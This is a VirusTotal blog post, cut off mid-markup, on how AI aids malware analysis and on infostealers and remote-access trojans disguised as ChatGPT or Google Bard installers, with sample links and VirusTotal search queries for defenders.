</ul></div></div>Pancho Perdomohttp://www.blogger.com/profile/09406313914317179794noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-82126701566768734762023-11-29T13:14:00.000+01:002023-11-29T13:14:40.785+01:00How AI is shaping malware analysis<p><span style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">We just released our “</span><a href="https://assets.virustotal.com/reports/2023-ai" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">Empowering Defenders: How AI is shaping malware analysis</span></a><span style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">” report, where we want to share VirusTotal’s visibility to help researchers, security practitioners and the general public better understand the nature of malicious attacks, this time focusing on how AI complements traditional malware analysis tools by providing a new functionality, leading to very significant time savings for analysts.</span><span style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span style="color: #4d4d4d; font-family: "Google 
Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Here are some of the main ideas presented:</span></p><span id="docs-internal-guid-e8af41b7-7fff-aa39-8e0f-7f27ac3fb3d6"><ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">AI offers a different angle on malware detection, from a binary verdict to a detailed explanation.</span></p></li><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">AI excels in identifying malicious scripts, particularly obfuscated ones, achieving up to 70% better detection rates compared to traditional methods 
alone.</span></p></li><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">AI proved to be a powerful tool for detection and analysis of malicious scripting tool sets traditionally overlooked by security products. </span></p></li><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">AI demonstrates enhanced detection and identification of scripts exploiting vulnerabilities, with an improvement on exploit identification of up to 300% over traditional tools alone.</span></p></li><li aria-level="1" dir="ltr" style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p 
dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">We observed suspicious samples using AI APIs or leveraging enthusiasm for AI products for distribution. However, AI usage in APT-like attacks cannot be confirmed at this time.</span></p></li></ul><div><span style="color: #4d4d4d; font-family: Google Sans, sans-serif;"><div class="separator" style="clear: both; text-align: center;"><a href="https://assets.virustotal.com/reports/2023-ai" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" data-original-height="387" data-original-width="665" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy6srh3O_U7A5u5yrxpR52t9LoLcQI_cTLqjjif5zgIBwfcsc29uPisOcnnNo0qR6sX8OLkayWjpQH9_8HCGdACaS1ragqnkB7_TeHwJYad6NdbL16cWIlK9mLZ14tSDd-vSYkwD7I-8kp1jqJmpDS8FQ32hoUIS3lb-Liin6bme9lMTFOkpryL_hMd9k/w640-h372/Frame%2097.png" width="640" /></a></div><br /><span style="font-size: 14.6667px; white-space-collapse: preserve;"><br /></span></span></div><div><span id="docs-internal-guid-0dbf4121-7fff-ec65-7ae0-a1535674a763"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">For full details, you can </span><a href="https://assets.virustotal.com/reports/2023-ai" style="text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-family: "Google Sans", 
sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">download the report here</span></a><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">. </span></p><br /><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">The question most asked of VirusTotal since AI became more mainstream is “have you found any AI generated malware”. Detecting if any malware was “AI generated” is a challenging task. How does one trace where any source code comes from? We played with different ideas, trying to find unusual patterns in malware families and actors for the last 12 to 15 months. Through all of our research, we didn’t see any strong indicators. 
</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">In this blog post we provide additional technical details for the AI-generated malware section of our report.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></p><h4 style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 3pt; padding: 0pt 0pt 11pt; text-align: left;"><span style="background-color: transparent; color: #434343; font-family: Arial,sans-serif; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Impersonation Tactics in the Age of AI</span></h4><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"><span id="docs-internal-guid-39e77815-7fff-dfb4-669a-59305828a090"></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span 
style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; white-space-collapse: preserve;">As the popularity of certain applications and services grows, cybercriminals capitalize on this trend by impersonating them to infect unsuspecting victims. We observed different campaigns abusing ChatGPT and Google Bard iconography, file name and metadata for distribution. Despite ChatGPT's official launch in November 2022 and Google Bard's in February 2023, it wasn't until early 2023 that distinct patterns and spikes in malware exploiting their reputations emerged, highlighting the evolving tactics of cybercriminals in leveraging popular trends.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj86AnZwZhJuvUunfFfc_ngNODJ40YNprU_HDqW6Ki3E7Px18yjWeUi6rAQciGxmsOPUig7TrUGNUIDckYwA0MWHhCI85nnolyEk8y1gP-CReP2JLvPXsLkSc7LZUFiROUzCSWeeXce4T8ef-pOemmZYjwDzzKWh61a47vIWFZOaxY8l2gqcrsB0vCJebc/s2480/Screenshot%202023-11-29%20at%2009.00.31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="2480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj86AnZwZhJuvUunfFfc_ngNODJ40YNprU_HDqW6Ki3E7Px18yjWeUi6rAQciGxmsOPUig7TrUGNUIDckYwA0MWHhCI85nnolyEk8y1gP-CReP2JLvPXsLkSc7LZUFiROUzCSWeeXce4T8ef-pOemmZYjwDzzKWh61a47vIWFZOaxY8l2gqcrsB0vCJebc/s16000/Screenshot%202023-11-29%20at%2009.00.31.png" /></a></div><span style="color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; white-space-collapse: preserve;"><br /></span><p></p><div><span style="background-color: transparent; color: #4d4d4d; font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; 
white-space-collapse: preserve;"><span id="docs-internal-guid-26c1fad6-7fff-6997-deab-c91ae2e34cb8"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Infostealers are the primary type of malware we've observed exploiting the reputations of ChatGPT and Google Bard. Families like Redline, Vidar, Raccoon, and Agent Tesla are among the most prevalent examples we've encountered. In addition, we found an extended list of Remote Access Trojan (RAT) families mimicking these applications, including DCRat, NjRAT, CreStealer, AsyncRAT, Lummac, RevengeRAT, Spymax, Aurora Stealer, Spynote, Warzone and OrcusRAT.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">After Windows executables, the second most popular sample type is Android:</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibb9PM0gtroAIB0f25htSjhYVGszMDZfi-UCZmkThjbJLOapzzBWFeDiE01HjxLD9V3wnNKHrcJuTQQL_X-FWQ2sP0F01jHBH4Ih918jtr_ciHYRd0XAxhmXW5NxZMgjFYZ9eIONi5sONiaN5Rto4a_n3XyLjK5B1HfSus3DpmWmgPMPSnM8L0cLYyZVo/s2398/Screenshot%202023-11-29%20at%2009.02.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1424" data-original-width="2398" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibb9PM0gtroAIB0f25htSjhYVGszMDZfi-UCZmkThjbJLOapzzBWFeDiE01HjxLD9V3wnNKHrcJuTQQL_X-FWQ2sP0F01jHBH4Ih918jtr_ciHYRd0XAxhmXW5NxZMgjFYZ9eIONi5sONiaN5Rto4a_n3XyLjK5B1HfSus3DpmWmgPMPSnM8L0cLYyZVo/s16000/Screenshot%202023-11-29%20at%2009.02.15.png" /></a></div><br /><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span><p></p><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-e69240a9-7fff-9ee8-6c63-89b190f287a6"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">As an example of infection vector, we found Redline samples deployed through a .bat file distributed inside a .zip bundling a </span><a href="https://www.virustotal.com/gui/file/12fadfc79cd9e8ad790af8a797d2984f2bd0b847d38e8e264e6b9dfa5da21ee8" style="text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">document</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> called "GPT CHAT 
INSTALLATION INSTRUCTIONS.docx":</span></p><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyAksXSjwuI9hsghMdNmjsf147w4LSkqPeCjk-LYkBvdJHFIUOCc4Paz7_tFN4OgqNSd7nZguC9qqyJHLKIWnBjR8VP25We_Xl0GXaRXudr9tPlbdaTP-03f9TMzpakm01isvgtuIgpJW8XXrzyeA6Klb-Ogv_vgj258wzDS1bS2entuguKCmm2plc3XU/s1880/Screenshot%202023-11-29%20at%2009.03.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1394" data-original-width="1880" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyAksXSjwuI9hsghMdNmjsf147w4LSkqPeCjk-LYkBvdJHFIUOCc4Paz7_tFN4OgqNSd7nZguC9qqyJHLKIWnBjR8VP25We_Xl0GXaRXudr9tPlbdaTP-03f9TMzpakm01isvgtuIgpJW8XXrzyeA6Klb-Ogv_vgj258wzDS1bS2entuguKCmm2plc3XU/s16000/Screenshot%202023-11-29%20at%2009.03.26.png" /></a></div><br /><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-3e67ff58-7fff-1c32-31cf-c8eb3e980fc7"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Another distribution vector is through the use of </span><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: 
baseline;">ISO images</span><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">. We found a </span><a href="https://www.virustotal.com/gui/file/fc5440be62559fcdd4c2d5726a41c3045e149277624b4cebc793f333324c7f21/relations" style="text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">Vidar</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> sample distributed through "ChatGPT For Dummies 2st Edition.iso".</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Other interesting findings include a Bumblebee </span><a href="https://www.virustotal.com/gui/file/9982330ae990386cd74625f0eaa26ae697574694eb2ec330c2acac5e0149fdc0/relations" style="font-size: 11pt; text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">sample</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> distributed as “ChatGPT_Setup.msi”, or a </span><a href="https://www.virustotal.com/gui/file/7d0d9cb75046c78bd8d69889d1e7e4023ae3d2ff39de4150a96ef57609c24e08/details" style="font-size: 11pt; text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">sample</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> (“ChatGPT_0.12.0_windows_x86_64.exe”) that uses drivers, probably to escalate privileges. “</span><a href="https://www.virustotal.com/gui/file/8aba6752b94d97b687611a1d740b17db5eca75661e49cc7e5ce67c0a5ade28f4/details" style="font-size: 11pt; text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">ChatGPT Complete Guide For Developers Students And Worrkers 2023.exe</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">” likewise uses Process Explorer drivers to elevate privileges during execution.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; 
font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Although the most popular infection vector for the samples analyzed is other samples (like droppers or compressed files), we found some of them distributed through legitimate websites, hosting services and web applications, and Discord. We believe the latter is on the verge of discontinuation as a distribution channel, as Discord has recently </span><a href="https://www.bleepingcomputer.com/news/security/discord-will-switch-to-temporary-file-links-to-block-malware-delivery/" style="text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">announced</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> a shift in its Content Delivery Network (CDN) approach.</span></p><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Additionally, we searched for samples communicating with platforms hosting AI models, based on the findings of the following Kaspersky </span><a href="https://securelist.ru/ataki-na-industrialnyj-i-gosudarstvennyj-sektory-rf/108229/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">blog post</span></a><span 
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">, where a </span><a href="https://www.virustotal.com/gui/file/0fe9d3f9c3dd4c71f9e9adc01a18ac62ad7efef7ca8d73a9ddc0cea4a02fe91c/relations" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">sample</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> downloads a potentially malicious model from </span><a href="http://huggingface.co" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">huggingface.co</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">. 
You can use the following </span><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520p%253A5%252B%2520(behavior_network%253Ahuggingface.co%2520or%2520embedded_url%253Ahuggingface.co%2520or%2520embedded_domain%253Ahuggingface.co)/files" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">query</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> to find suspicious samples communicating with this domain.</span></span></span></div></span></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><h4 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-weight: 700;">Suspicious samples using OpenAI’s API</span></h4><br /><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">The number of suspicious samples interacting in some way with </span><a href="http://api.openai.com" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial, sans-serif; font-size: 11pt; 
font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">api.openai.com</span></a><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> shows a slow growing trend, with a peak in August 2023.</span></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbbd4jLPMHPcaOP40wlq8puLVzoI87HlmGFbFiBHxQrmGf0A38QueiwJMssz_9SSkCv0eo4GPZfnIJfdRZIsqULUfRzbLU1tPER9A_dJdx4q2cYd2WSBwb8ynQ4dB4DiEwVDOZW8-Pqn-n9y43Zlwaplgk7hxsdrbJlA_yWg-C8udhhvS13Wf06PxybGM/s1866/Screenshot%202023-11-29%20at%2009.06.48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="806" data-original-width="1866" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbbd4jLPMHPcaOP40wlq8puLVzoI87HlmGFbFiBHxQrmGf0A38QueiwJMssz_9SSkCv0eo4GPZfnIJfdRZIsqULUfRzbLU1tPER9A_dJdx4q2cYd2WSBwb8ynQ4dB4DiEwVDOZW8-Pqn-n9y43Zlwaplgk7hxsdrbJlA_yWg-C8udhhvS13Wf06PxybGM/s16000/Screenshot%202023-11-29%20at%2009.06.48.png" /></a></div><br /><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">To search for files that contact or contain the OpenAI API endpoint you can use the following query:</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520p%253A5%252B%2520(embedded_domain%253Aapi.openai.com%2520or%2520behaviour_network%253Aapi.openai.com)/files" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">entity:file p:5+ (embedded_domain:api.openai.com or behaviour_network:api.openai.com)</span></a></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Another option could be searching for common patterns when using the OpenAI API:</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520p%253A5%252B%2520(content%253Acode-davinci%2520or%2520content%253Atext-davinci%2520or%2520content%253A%2520api.openai.com)" 
style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">entity:file p:5+ (content:code-davinci or content:text-davinci or content: api.openai.com)</span></a></p><br /><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">A third option is getting files related to the URL </span><a href="https://www.virustotal.com/gui/domain/api.openai.com/relations" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">api.openai.com</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">, which includes files that reference this domain and communicating files.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7UTp6MjCeIklqJBP_IIAXU519SzGv0U3fX29IF5owOGJXLqGsH_N7RCBBDO08OxSZ2v54Of-uKW-9kvSCipn7CfxZ3KHdCbUHIA9AMNF5FpjqRSrpmMUoCrFjY8tqoJ92QauqFn3DV0sHSyf3NS7cHaJPGNjqnMtknPkaYfROw3g83L23oi3FL9GGbyI/s1892/Screenshot%202023-11-29%20at%2009.13.07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="428" data-original-width="1892" 
